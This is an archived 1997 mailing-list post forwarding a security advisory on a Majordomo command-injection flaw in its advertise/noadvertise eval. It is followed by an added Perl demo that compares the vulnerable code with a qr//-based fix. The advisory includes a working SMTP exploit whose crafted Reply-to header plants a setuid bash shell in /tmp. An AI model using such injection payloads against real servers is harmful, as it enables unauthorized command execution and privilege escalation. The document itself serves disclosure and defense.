Great Circle Associates Majordomo-Users
(August 1997)
 


Subject: [Fwd: BoS: Vulnerability in Majordomo]
From: David Coe <david @ coe . woodbine . md . us>
Date: Sun, 24 Aug 1997 18:39:20 -0400
To: "list: Majordomo Users" <majordomo-users @ GreatCircle . COM>

This appears to be true.  Anybody know how to fix it?

-- 
David Coe <david@coe.woodbine.md.us>
--- Begin Message ---
Subject: BoS: Vulnerability in Majordomo
From: Razvan Dragomirescu <drazvan @ kappa . ro>
Date: Sun, 24 Aug 1997 15:17:18 +0300 (EET DST)
To: best-of-security @ cyber . com . au
Old-x-envelope-from: drazvan@pop3.kappa.ro Sun Aug 24 22:11:46 1997
Resent-date: Sun, 24 Aug 1997 15:18:02 +0300 (EET DST)
Resent-from: best-of-security @ cyber . com . au
Resent-message-id: <Pine.LNX.3.96.970824151802.13326B@pop3.kappa.ro>
Resent-sender: best-of-security-request @ cyber . com . au
Resent-to: best-of-security @ cyber . com . au

Hello all,

I have discovered a vulnerability in "majordomo" that allows local and
remote users to execute commands with the rights of the user running the
server. This user is usually in the daemon group, so this can be quite harmful.

Still, there is a condition for the exploit to work. The server should
have at least one list that uses the "advertise" or "noadvertise"
directives in the configuration files. These directives indicate if the
list should (or should not) be included in a reply to a "LISTS" command
depending on the address the request came from. The exploit also works if
the server has one or more "hidden" lists (see the Majordomo documentation
for details).

Here's a piece of the configuration file:

-- lrazvan.config --

        # advertise            [regexp_array] (undef) <majordomo>
        # If the requestor email address matches one of these regexps, then
        # the list will be listed in the output of a lists command. Failure
        # to match any regexp excludes the list from the output. The
        # regexps under noadvertise override these regexps.
advertise           <<  END
/.*/
END
-- end lrazvan.config --

The one above tells majordomo to include this list in any "LISTS" request.

The problem is that when the server finds a list that has one of these
attributes ("advertise" or "noadvertise"), it will try to match the
reply-to address against these patterns. It uses an "eval" command to do this.

Let's take a look at the Perl source (the do_lists procedure):

-- majordomo --
foreach $i (@array) {
    $command = "(q~$reply_addr~ =~ $i)";
    $result = 1, last if (eval $command);
}
-- end majordomo --

$reply_addr is the result of some paranoid validation. It cannot contain
<,>,[,],-,+,(,),; etc.
But with a few tricks, this won't be a problem :).

Now, for the exploits. There are two of them, one for the local users who
just want a setuid shell (with the rights of the server owner, usually
majordomo.daemon), and one for the remote users who might want to copy
some files or execute commands remotely (the old "mail foo@foo.net <
/etc/passwd" won't work, it contains '<' ...).

Local exploit:
--exploit--
telnet localhost 25

helo localhost
mail from: user
rcpt to: majordomo (or whatever the name of the majordomo user is)
data
From: user
To: majordomo
Reply-to: a~.`/bin/cp\${IFS}/bin/bash\${IFS}/tmp/lord&&/bin/chmod\${IFS}4777\${IFS}/tmp/lord`.q~a/ad=cucu/c=blu\\\@kappa.ro

LISTS



--- End Message ---
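
As an added illustration (not part of David Coe's or Razvan Dragomirescu's messages, and not Majordomo's own code), the Perl script below reproduces the eval-based advertise/noadvertise match quoted in the advisory and puts it next to a version that compiles each configured "/regexp/" entry with qr// once and matches the address as data, so nothing the sender controls is ever parsed as Perl. Assumptions: config entries are plain /regexp/ literals with at most an "i" flag; the mail-header parsing and address validation that produce $reply_addr inside Majordomo are not reproduced, the crafted address is handed to the functions directly; the constructed payload keeps the advisory's shape (a "~" to close q~...~, backticks, \${IFS} in place of whitespace, q~ to reopen a quote) but only runs touch on a marker file under /tmp instead of planting a setuid shell.

```perl
#!/usr/bin/perl
# Added demonstration, not Majordomo code: the eval-based advertise match
# from the advisory beside a version that matches without string eval.
use strict;
use warnings;

# Vulnerable: mirrors the do_lists loop. $reply_addr is spliced into Perl
# source text and eval'ed. q~...~ only protects while the address contains
# no '~'; one '~' ends the quote and everything after it is Perl code.
sub vulnerable_match {
    my ($reply_addr, @patterns) = @_;
    for my $i (@patterns) {
        my $command = "(q~$reply_addr~ =~ $i)";
        return 1 if eval $command;
    }
    return 0;
}

# Fixed: turn a config entry ("/regexp/" plus optional "i" flag, an assumed
# format) into a compiled regex and match the address as data. The pattern
# stays admin-controlled config; an interpolated (?{...}) is refused by perl
# unless 'use re "eval"' is in effect, so the regex cannot run code either.
sub compile_pattern {
    my ($spec) = @_;
    my ($re, $flags) = $spec =~ m{\A/(.*)/([a-z]*)\z}s
        or die "unsupported pattern syntax: $spec\n";
    die "unsupported regexp flag in: $spec\n" if $flags =~ /[^i]/;
    return $flags =~ /i/ ? qr/$re/i : qr/$re/;
}

sub safe_match {
    my ($reply_addr, @patterns) = @_;
    for my $spec (@patterns) {
        my $re = compile_pattern($spec);
        return 1 if $reply_addr =~ $re;
    }
    return 0;
}

# advertise/noadvertise semantics from the config comment: the list is shown
# if the address matches an advertise regexp and no noadvertise regexp.
sub list_advertised {
    my ($matcher, $reply_addr, $advertise, $noadvertise) = @_;
    return 0 if $matcher->($reply_addr, @$noadvertise);
    return $matcher->($reply_addr, @$advertise);
}

my @advertise   = ('/.*/');                 # same as the lrazvan.config excerpt
my @noadvertise = ('/\@spam\.example$/i');  # constructed for this demo

# Constructed payload in the advisory's shape. '~' closes q~...~, the backticks
# run a shell command, q~ reopens a quote so the rest still parses. The real
# payload copies a shell and chmods it 4777; this one only touches a marker.
my $marker  = "/tmp/mjdemo.$$";
my $payload = "a~.`touch\\\${IFS}$marker`.q~a\@example.com";

# With the breakout, each eval returns "a" . <command output> . <match>, a
# non-empty string, so the command runs on the first pattern evaluated and
# the reported match result carries no information.
for my $addr ('user@example.com', 'user@SPAM.example', $payload) {
    unlink $marker;
    my $v     = list_advertised(\&vulnerable_match, $addr, \@advertise, \@noadvertise);
    my $ran_v = -e $marker ? "shell command ran" : "no side effect";
    unlink $marker;
    my $s     = list_advertised(\&safe_match, $addr, \@advertise, \@noadvertise);
    my $ran_s = -e $marker ? "shell command ran" : "no side effect";
    printf "%-48s eval: advertised=%d (%s)  fixed: advertised=%d (%s)\n",
        $addr, $v, $ran_v, $s, $ran_s;
}
unlink $marker;
```

Run it with perl. For the two ordinary addresses both matchers agree (advertised, then hidden by noadvertise). For the crafted address the eval version creates the marker file during the noadvertise check, before any advertise pattern is even consulted, while the qr// version simply reports whether the odd-looking string matches and runs nothing.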
